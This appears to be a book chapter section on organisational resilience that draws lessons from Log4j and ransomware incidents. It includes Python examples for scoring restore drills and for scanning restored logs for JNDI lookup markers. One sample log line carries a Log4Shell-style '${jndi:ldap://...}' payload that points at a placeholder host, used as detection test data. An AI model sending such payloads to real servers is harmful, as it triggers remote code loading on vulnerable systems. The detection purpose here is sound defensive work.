§8.1 · Decisions Are Made Under Load

Stress Tests the System

Stress doesn’t break the system. It exposes what was already weak.

We often talk about “testing under load” as a strength-building concept. In the gym, it’s simple. Your ability to move weight when you’re tired is the real signal of progress. But in product leadership, systems design, and incident response, stress testing is often overlooked until it’s too late.

The Log4j vulnerability in December 2021 made that brutally clear. A zero-day vulnerability in a widely used Java logging library allowed remote code execution with minimal effort. Suddenly, nearly every organization had the same urgent questions:

  • Are we exposed?
  • Where is Log4j deployed in our environment?
  • Do we have visibility into historical access or exploitation attempts?

This wasn’t just a code issue. It was a test of organizational readiness — technical, operational, and strategic. Teams that had practiced incident response, mapped their architecture, and built cross-functional trust could move with purpose. Others stumbled, not because they didn’t care, but because they’d never trained for the moment.

It was the backup problem, writ large. Many companies back up data religiously, but few test whether they can actually recover it. Even fewer know how long recovery will take, or whether they can really meet their RTO (Recovery Time Objective) and RPO (Recovery Point Objective). The lesson was hard-earned: backups are only as valuable as your ability to restore fast.
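One way to make those two numbers concrete is to record every restore rehearsal and compare it against the targets. What follows is a minimal sketch, not a prescribed tool: the RestoreDrill record, its field names, and the four-hour and eight-hour targets are all hypothetical, chosen only to show the arithmetic.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class RestoreDrill:
    """One rehearsal of a restore. All field names here are hypothetical."""
    outage_start: datetime      # when the simulated failure began
    service_restored: datetime  # when the restored system was usable again
    last_good_backup: datetime  # timestamp of the newest backup that restored cleanly


def evaluate_drill(drill: RestoreDrill, rto: timedelta, rpo: timedelta) -> dict:
    """Compare what the drill actually achieved against the stated objectives."""
    # Time the business was without the system: measured against the RTO.
    recovery_time = drill.service_restored - drill.outage_start
    # Span of data that could not be recovered: measured against the RPO.
    data_loss_window = drill.outage_start - drill.last_good_backup
    return {
        "recovery_time": recovery_time,
        "data_loss_window": data_loss_window,
        "met_rto": recovery_time <= rto,
        "met_rpo": data_loss_window <= rpo,
    }


# Illustrative numbers only: a 5.5 hour restore with 6 hours of lost data.
drill = RestoreDrill(
    outage_start=datetime(2024, 3, 1, 9, 0),
    service_restored=datetime(2024, 3, 1, 14, 30),
    last_good_backup=datetime(2024, 3, 1, 3, 0),
)
result = evaluate_drill(drill, rto=timedelta(hours=4), rpo=timedelta(hours=8))
print(result["met_rto"], result["met_rpo"])  # False True
```

In this made-up drill the backup was fresh enough, but the restore took ninety minutes longer than the target. That gap only becomes visible when someone actually runs the restore and writes down the timestamps.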

Log4j forced a parallel reckoning. Exploitation attempts were seen in the wild at least a week before the public disclosure, and the vulnerable code had shipped for years, so nobody could say with confidence how far back to search. Most organizations didn’t retain accessible data that far back. They had cold storage, frozen or tiered off for cost savings, but had never practiced bringing it back online quickly for investigation.

When the pressure hit, teams had to figure out, often in real time, how to thaw data, rehydrate logs, and search for infection markers across old records.

Some had tested this process before. They knew the commands, the timing, the quirks of their tooling. They’d trained like operators. Others hadn’t. Some couldn’t search more than 30 days back. Others found that recovering historical logs was so cumbersome that the logs might as well not have existed. Those companies weren’t just missing data. They were missing a disaster recovery plan for threat analytics.
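The search itself is the easy part once the data is back. As a rough sketch, assuming the restored logs are plain text lines, a first pass can look for the `${jndi:` lookup string that Log4Shell attempts carried. The function name and the sample log lines below are invented for illustration. Real attempts were often obfuscated, so a match is a lead to investigate and an empty result is not proof of safety.

```python
import re
from typing import Iterable, Iterator, Tuple

# Plain, unobfuscated form of the lookup string seen in Log4Shell attempts.
# Obfuscated variants will slip past this, so treat it as a floor, not a ceiling.
JNDI_MARKER = re.compile(r"\$\{jndi:", re.IGNORECASE)


def find_suspect_lines(lines: Iterable[str]) -> Iterator[Tuple[int, str]]:
    """Yield (line_number, line) for every line containing the marker."""
    for number, line in enumerate(lines, start=1):
        if JNDI_MARKER.search(line):
            yield number, line.rstrip("\n")


# Two invented access-log lines: one benign, one carrying the marker
# in the user-agent field.
sample = [
    '10.0.0.5 - - "GET /health HTTP/1.1" 200 "curl/7.79"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
]
hits = list(find_suspect_lines(sample))
print(hits[0][0])  # 2
```

Because the function accepts any iterable of lines, the same pass works on an open file handle, which matters when the restored archive is too large to load into memory. The hard part, and the part worth rehearsing, is getting months of cold data into a state where a scan like this can run at all.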

At Elastic, customers who had previously rehearsed these data flows — archiving, restoring, and hunting — were able to quickly triage and verify impact, drawing from months-old telemetry. They weren’t just ingesting logs. They were building institutional memory.

And this mirrors what elite military units do when they train decision-making under fatigue. In Navy SEAL training or Army Special Forces SERE programs, candidates are made to perform operational tasks after sleep deprivation, cold water exposure, and physical exhaustion.

Not to break them, but to reveal what’s already broken.

In those moments, you don’t rise to the level of the manual. You fall to the level of your defaults. And the only way to improve those defaults is to train them, deliberately, under controlled stress.

The same pattern has repeated since. In February 2024, the Change Healthcare ransomware attack disrupted claims processing, prescription routing, and billing across much of U.S. healthcare. The vulnerability wasn’t novel. What separated organizations was readiness. Hospitals that had drilled their incident response could keep dispensing prescriptions on paper. Others lost weeks to manual workarounds because no one had practiced operating without the platform. Same lesson, different load. Stress finds the truth.

The 2026 Stress Test Is Machine-Speed

The Log4j-shaped stress test was bad. The 2026 version is worse, because the attackers are no longer human-speed.

The mean time from vulnerability disclosure to confirmed exploitation has fallen from 2.3 years in 2019 to under one day in 2026. Breakout times — the window between initial compromise and lateral movement — are measured in seconds. Phishing campaigns crafted by large language models hit click-through rates 4.5 times higher than human-written ones. Capabilities that once required nation-state expertise are now available to anyone with an API key.

If you are not using AI to battle AI, you will lose. Defensive AI is the new minimum entry fee just to stay level. We will go deeper on this in the chapter on AI.

Stress Finds the Truth

It’s no different in product and platform work. You might have a dashboard for monitoring, a workflow for restores, a playbook for incident response. But unless you’ve tested them when it matters, they’re just ideas. Stress finds the truth.

So whether you’re squatting on trembling legs after five working sets or trying to rehydrate petabytes of logs to confirm an intrusion:

The system only works if it works under pressure.

This isn’t a new idea. We introduced it in Chapter 2 with James Clear:

“You do not rise to the level of your goals. You fall to the level of your systems.”

Under the weight of stress and urgency, that line deepens.

Goals vanish in crisis. Roadmaps collapse under pressure. What remains is the infrastructure you’ve trained, tested, and trusted.

Whether that’s a disaster recovery pipeline, a muscle memory forged in fatigue, or a culture that knows how to move without waiting for permission, it’s your system that carries you.

Resilience isn’t reactive — it’s built. Deliberately. Daily. And under load.